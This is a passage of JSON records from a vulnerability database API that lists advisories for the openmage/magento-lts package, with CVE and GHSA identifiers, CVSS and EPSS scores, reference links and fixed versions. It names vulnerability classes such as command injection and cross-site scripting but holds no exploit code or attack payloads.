"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T21:01:23Z/" } ], "url": "https://hackerone.com/reports/1086752" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21395", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21395" }, { "reference_url": "https://packagist.org/packages/openmage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T21:01:23Z/" } ], "url": "https://packagist.org/packages/openmage/magento-lts" }, { "reference_url": "https://github.com/advisories/GHSA-r3c9-9j5q-pwv4", "reference_id": "GHSA-r3c9-9j5q-pwv4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r3c9-9j5q-pwv4" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-r3c9-9j5q-pwv4", "reference_id": "GHSA-r3c9-9j5q-pwv4", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", 
"scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T21:01:23Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-r3c9-9j5q-pwv4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2021-21395", "GHSA-r3c9-9j5q-pwv4", "GMS-2023-158" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g75g-ab3s-y7db" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44323?format=api", "vulnerability_id": "VCID-gewj-4tzh-k3e5", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in openmage/magento-lts.", 
"references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41143", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01224", "scoring_system": "epss", "scoring_elements": "0.7948", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.01224", "scoring_system": "epss", "scoring_elements": "0.79467", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.01224", "scoring_system": "epss", "scoring_elements": "0.79478", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.01224", "scoring_system": "epss", "scoring_elements": "0.79452", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.01224", "scoring_system": "epss", "scoring_elements": "0.79485", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41143" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/45330ff50439984e806992fa22c3f96c4d660f91", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:21Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/45330ff50439984e806992fa22c3f96c4d660f91" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:21Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:21Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41143", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41143" }, { "reference_url": "https://github.com/advisories/GHSA-5vpv-xmcj-9q85", "reference_id": "GHSA-5vpv-xmcj-9q85", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5vpv-xmcj-9q85" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5vpv-xmcj-9q85", "reference_id": "GHSA-5vpv-xmcj-9q85", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": 
"" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:21Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5vpv-xmcj-9q85" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2021-41143", "GHSA-5vpv-xmcj-9q85", "GMS-2023-155" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gewj-4tzh-k3e5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44329?format=api", "vulnerability_id": "VCID-gn12-464m-fkcu", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in openmage/magento-lts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39217", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00724", "scoring_system": "epss", "scoring_elements": "0.72961", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00724", "scoring_system": "epss", "scoring_elements": "0.72978", 
"published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00724", "scoring_system": "epss", "scoring_elements": "0.7297", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00724", "scoring_system": "epss", "scoring_elements": "0.72947", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00724", "scoring_system": "epss", "scoring_elements": "0.72933", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39217" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/289bd4b4f53622138e3e5c2d2cef7502d780086f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:24Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/289bd4b4f53622138e3e5c2d2cef7502d780086f" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:24Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": 
"https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:24Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39217", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39217" }, { "reference_url": "https://github.com/advisories/GHSA-c9q3-r4rv-mjm7", "reference_id": "GHSA-c9q3-r4rv-mjm7", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c9q3-r4rv-mjm7" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-c9q3-r4rv-mjm7", "reference_id": "GHSA-c9q3-r4rv-mjm7", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:24Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-c9q3-r4rv-mjm7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": 
"pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2021-39217", "GHSA-c9q3-r4rv-mjm7", "GMS-2023-156" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gn12-464m-fkcu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45995?format=api", "vulnerability_id": "VCID-h9n9-9mxj-zqd6", "summary": "Improper Neutralization in openmage/magento-lts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-41879", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.27707", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.31696", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.31729", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.31767", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-41879" }, { "reference_url": 
"https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/2a2a2fb504247e8966f8ffc2e17d614be5d43128", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-26T16:53:59Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/2a2a2fb504247e8966f8ffc2e17d614be5d43128" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/31e74ac5d670b10001f88f038046b62367f15877", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-26T16:53:59Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/31e74ac5d670b10001f88f038046b62367f15877" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.5.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": 
"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-26T16:53:59Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.5.1" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.1.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-26T16:53:59Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.1.1" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41879", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41879" }, { "reference_url": "https://github.com/advisories/GHSA-9358-cpvx-c2qp", "reference_id": "GHSA-9358-cpvx-c2qp", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9358-cpvx-c2qp" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-9358-cpvx-c2qp", "reference_id": "GHSA-9358-cpvx-c2qp", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-26T16:53:59Z/" } ], "url": 
"https://github.com/OpenMage/magento-lts/security/advisories/GHSA-9358-cpvx-c2qp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/66839?format=api", "purl": "pkg:composer/openmage/magento-lts@20.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.1.1" } ], "aliases": [ "CVE-2023-41879", "GHSA-9358-cpvx-c2qp" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-h9n9-9mxj-zqd6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46590?format=api", "vulnerability_id": "VCID-jfan-uqf5-3qhd", "summary": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in openmage/magento-lts.", "references": [ { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/pull/3220", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", 
"scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/pull/3220" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.2.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.2.0" }, { "reference_url": "https://hackerone.com/reports/1948040", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://hackerone.com/reports/1948040" }, { "reference_url": "https://github.com/advisories/GHSA-9j5w-2cqc-cwj9", "reference_id": "GHSA-9j5w-2cqc-cwj9", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9j5w-2cqc-cwj9" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-9j5w-2cqc-cwj9", "reference_id": "GHSA-9j5w-2cqc-cwj9", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-9j5w-2cqc-cwj9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/68090?format=api", "purl": "pkg:composer/openmage/magento-lts@20.2.0", "is_vulnerable": true, 
"affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.2.0" } ], "aliases": [ "GHSA-9j5w-2cqc-cwj9", "GMS-2023-5656" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jfan-uqf5-3qhd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41370?format=api", "vulnerability_id": "VCID-jr6u-gjtr-3udv", "summary": "XPath Injection\nAdmin users can execute arbitrary commands via block methods.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-32758", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0036", "scoring_system": "epss", "scoring_elements": "0.58503", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0036", "scoring_system": "epss", "scoring_elements": "0.58469", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.0036", "scoring_system": "epss", "scoring_elements": "0.58516", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0036", "scoring_system": "epss", "scoring_elements": "0.58525", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0036", "scoring_system": "epss", "scoring_elements": "0.58517", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-32758" }, { "reference_url": 
"https://github.com/OpenMage/magento-lts/commit/b99307d00b59c4a226a1e3e4083f02cf2fc8fce7", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/commit/b99307d00b59c4a226a1e3e4083f02cf2fc8fce7" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.15", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.15" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.13", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.13" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-26rr-v2j2-25fh", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-26rr-v2j2-25fh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32758", "reference_id": "CVE-2021-32758", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32758" }, { "reference_url": "https://github.com/advisories/GHSA-26rr-v2j2-25fh", "reference_id": "GHSA-26rr-v2j2-25fh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-26rr-v2j2-25fh" } ], "fixed_packages": [ { "url": 